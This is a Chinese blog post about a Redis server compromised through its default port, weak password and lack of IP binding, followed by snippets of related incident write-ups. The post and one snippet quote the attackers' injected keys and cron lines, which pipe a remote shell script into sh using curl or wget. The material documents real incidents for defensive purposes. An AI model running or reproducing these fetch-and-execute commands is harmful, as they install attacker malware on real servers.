redis被攻击

最新推荐文章于 2024-11-08 18:30:00 发布
最新推荐文章于 2024-11-08 18:30:00 发布
阅读量1.4k 收藏 8
点赞数 37
文章标签: redis 数据库 缓存
xiaopzi
本文链接:https://blog.csdn.net/nihao123456789222/article/details/135449533
版权
文章讲述了作者的Redis服务器因未改端口、简单密码和未限制IP访问,遭到了攻击。攻击者利用上传工具在服务器上执行了string脚本,包括pm.sh文件,进一步删除了主库的rdb和aof文件以阻止数据恢复。这是一起关于Redis安全防护的案例。
摘要由CSDN通过智能技术生成

之前由于redis没有修改端口,密码也比较简单,也没有绑定ip 结果被攻击了

1 redis里被写入string类型的脚本,比如:Back1 Back2 Back3 Back4 ,内容curl -fsSL http://d.powerofwish.com/pm.sh | sh的形式,如下图:

这个pm.sh脚本被放在被上传工具文件里

2 /www/server/redis下多了一个root文件 具体文件放在被上传工具文件里

3 去把主库的rdb文件和aof文件删下防止用这个数据恢复。

我的在appendonly.aof文件里看到了以下命令

xiaopzi123123
关注
redis安全大量删除数据
SBS技术栈-晓白
03-15 3038
需求:我需要删除redis集群(从备机)下的关于user开头的所有数据; 服务器:主节点1、主节点2、主节点3,从节点1、从节点2、从节点3;读写分离 博主背景:JAVA工程师 环境:SpringBoot2.1.1,spring-boot-starter-data-redis依赖包 刚开始我想到了的方案: 第一步:先key*获取所有redis相关key 第二部:再一个一个的在JAVA中循环的删除k...
Redis攻击纪实
程序员青菜学厨记
11-08 496
1、2017年时候测试环境安装的是Redis4.0版本(或者更低,记不太清了),默认安装6379端口可以远程访问,然后被黑了,被人家做为挖矿机,他们太狠了,一定要把我CPU耗尽,搞得别的程序都跑不了(这样别人不就发现了吗,不能控制CPU的占用情况吗?上周新来的同事分享Redis的原理和机制,想起2017年的时候测试环境Redis攻击,最后只能重新安装服务器,今天试验一把利用Redis漏洞进行攻击,只有理解了别人是怎么攻击的,才能更好地进行防范。注:忘记截屏了,重启了Redis,那个注入的key找不到了。
redis漏洞被攻击
dwdqsa的博客
03-05 604
redis在无密码 且无bind情况下 黑客可以拿到root凌晨四点 服务器被攻击 之后服务器内存一直被udevs占满,疑似挖矿进程,删除会自动恢复去掉执行权限 chmod -x 后 杀掉进程 服务器正常...
记一次Redis攻击事件
Dxx_23的博客
04-02 1109
redis版本为:7.2.4。
redis攻击笔记
半僧
12-31 3543
公司redis集群不断丢失数据,莫名进程不断涌起。经过几天排查,锁定redis攻击。很多使用者都是把redis下载到服务器直接运行使用,无ACL,无密码,root运行,且绑定在0.0.0.0:6379,暴露在公网。攻击者在未授权访问 Redis 的情况下通过redis的机制,可以将自己的公钥或者其他恶意程序写入目标服务器中,从而可以直接控制目标服务器。 下面还原攻击情况:寻找无验证的redis
线上redis 服务器被恶意清空(被黑)
学无止境
09-26 57
查看定时任务时发现有些任务在执行,看这名字就觉得不像好东西 crontab -l image.png 进入定时任务log 进行查看 cd /var/log image.png 打开一个最近的看看 image.png 看看,从一个陌生网站下载sh 脚本执行,这个ip 还是美国的。 打开看了看,看不太懂。。。 看了下 var/log 下的secure-20190901 日志...
redis攻击还原
10-05
文档中提到的Redis攻击还原,涵盖了攻击者如何利用Redis服务发起攻击以及如何进行防御。 首先,文档指出Redis攻击的原理之一在于其默认配置并不安全,特别在未设置密码认证的情况下,任何知道Redis服务所在IP和端口...
Redis服务器被攻击后该如何安全加固
good7ob的博客
10-05 208
Redis服务器是一个强大的工具,但它也需要得到适当的安全加固,以防止未经授权的访问和数据泄漏。在Redis服务器受到攻击后,应急响应非常重要,包括断开与公网的连接、修改密码、清除不安全数据等。此外,采取一系列的安全加固措施,如启用认证、限制访问IP、修改默认端口、配置防火墙等,可以大大提高Redis服务器的安全性。通过采取适当的安全措施和不断监控Redis服务器的安全状态,您可以降低潜在风险,确保Redis服务器在面对各种威胁时能够保持安全。希望本文提供的信息能够帮助您更好地保护您的Redis服务器。
记一次centos7因redis默认端口被恶意植入病毒解决
SQLINGBING的博客
08-26 1357
centos7因为redis使用默认接口被攻击中了[scan]病毒后的解决
关于阿里云服务器因攻击被限制访问部分目的端口6379端口访问阻断_Redis设置密码
DreamsArchitects的博客
02-04 3583
//关闭Redis redis-cli shutdown //关闭服务端 pkill redis-server 再次启动Redis服务,指定配置文件启动 redis-server /usr/local/redis/redis-5.0.0/redis.conf //使用密码进入Redis redis-cli –a 123456
记一次Redis被入侵(被黑)处理过程
nelson的博客
05-22 3502
通常作为一名后端程序员,并没有系统的学习过关于服务器安防相关的知识,遇到服务器被黑的情况往往比较迷茫,不知道从何下手。服务器可能遭受的攻击多种多样,以下主要讲述的是我本次遇到的一次服务器被黑客拿来当矿机的处理过程。 攻击的发现 之所以发现服务器被攻击了是因为有用户反馈系统卡顿非常严重,我知道一般用户反馈描述的那个时间点不应该会有这么高的延迟的,所以就登录服务器查看以下CPU等资源的消耗情况。(挖矿...
Redis 阿里云服务器遭遇攻击
mrathena
11-20 1844
博文目录 文章目录攻击提醒查看异常638063796381补救操作系统操作Redis添加密码认证残留问题 攻击提醒 通过描述来看, 我的服务器被挂马, 一直在尝试攻击别人服务器的6379端口, 阿里云一定时限内禁止我访问其他服务器的6379端口 我估计是因为我的Redis使用了默认的6379端口, 且没有设置密码, 且开放了一堆端口到公网, 且使用的是root账户, 被人扫到了, 然后通过漏洞做了不好的事情, 我是Linux小白, 只能百度看看有什么查漏补缺的措施了 查看异常 执行top发现有两个进程占
Redis 也能被攻击?一次Redis被入侵的记录
探索云原生
12-05 5659
通过 RDB 方式入侵,Redis攻击记录 1. 详情 发现 Redis 中突然多了几个 key backup1 backup2 backup3 backup4 具体内容如下: */2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 *
redis受到攻击
weixin_42908597的博客
11-16 570
redis受到攻击怎么办? 1.主从配置 2.持久化储存redis,不以root账户启动 3,。增加redis密码验证(设置复杂密码) 4.不允许key方式登录 5.以非root权限启动redis 6.禁止公网开放redis端口, 7.检查authorized_keys是否非法 ...
redis攻击,怎么预防
weixin_33696106的博客
12-18 605
今天,自己的redis服务器被黑客攻击了,数据全部被删除 从图中可以看到,在db0中多了一个crackit,他就是罪魁祸首,他的值就是ssh无密码连接时需要的authorized_keys。 我们被攻击,主要是因为没有打开防火墙,而且6379这个端口直接对外暴露,所以遭到了黑客的攻击。 解决办法: 1.打开防火墙,6379端口只对调用的ip暴漏(如何配置见我上一篇博客) 2.为r...
redis全部key莫名消失——redis攻击
小龙
12-17 4572
redis全部key莫名消失——redis攻击 刚刚接触redis不久,对redis也只是做了一些简单的配置,所以,在刚刚使用的时候,也仅仅是将redis的环境搭建好,至于redis的端口(6379)和密码(redis默认配置没有密码)也没有做更改。 前一段时间,偶然的发现,有时候redis里面的数据莫名其妙的全部被清除掉了,刚开始总是以为是redis哪里配置的有问题,可能配置的有定...
记一次Redis攻击的事件
weixin_33816946的博客
11-12 735
最近几个月非常忙,所以很少有时间写博客,这几天终于闲了一些,于是就在整理平时的一些笔记。恰好这几天Redis服务器发生了问题,就记录一下。 我司有两款分别是2B和2C的App,类似于阿里旺旺的卖家版和买家版,里面有一个聊天的功能模块。双方可以通过这个功能聊天。内部通讯使用了环信,只是将本地账号和环信账号进行了关联。其他的信息,比如用户基本信息,好友关系,群组关系等存在Redis中,为防止Redi...
redis用法(二)
墨城的博客
11-07 938
Redis hash 是一个 string 类型的 field(字段) 和 value(值) 的映射表,hash 特别适合用于存储对象。任务,学会五大数据类型,知道一个产品,再使用redis的时候,写入的key是多少个,以及写入的key都是什么类型。Redis 有序集合和集合一样也是 string 类型元素的集合,且不允许重复的成员。Redis 中集合是通过哈希表实现的,所以添加,删除,查找的复杂度都是 O(1)。集合成员是唯一的,这就意味着集合中不能出现重复的数据。大家公有的,去重的所有数据。
Redis - 事务
最新发布
ketil27的博客
11-08 516
Redis 的事务和MySQL的事务概念上是类似的.都是把⼀系列操作绑定成⼀组.让这⼀组能够批量执 ⾏.弱化的原⼦性:redis没有"回滚机制".只能做到这些操作"批量执⾏".不能做到"⼀个失败就恢复到 初始状态".不保证⼀致性:不涉及"约束". 也没有回滚.MySQL的⼀致性体现的是运⾏事务前和运⾏后,结果都 是合理有效的,不会出现中间⾮法状态.不需要隔离性:也没有隔离级别,因为不会并发执⾏事务(redis单线程处理请求).
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaopzi123123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值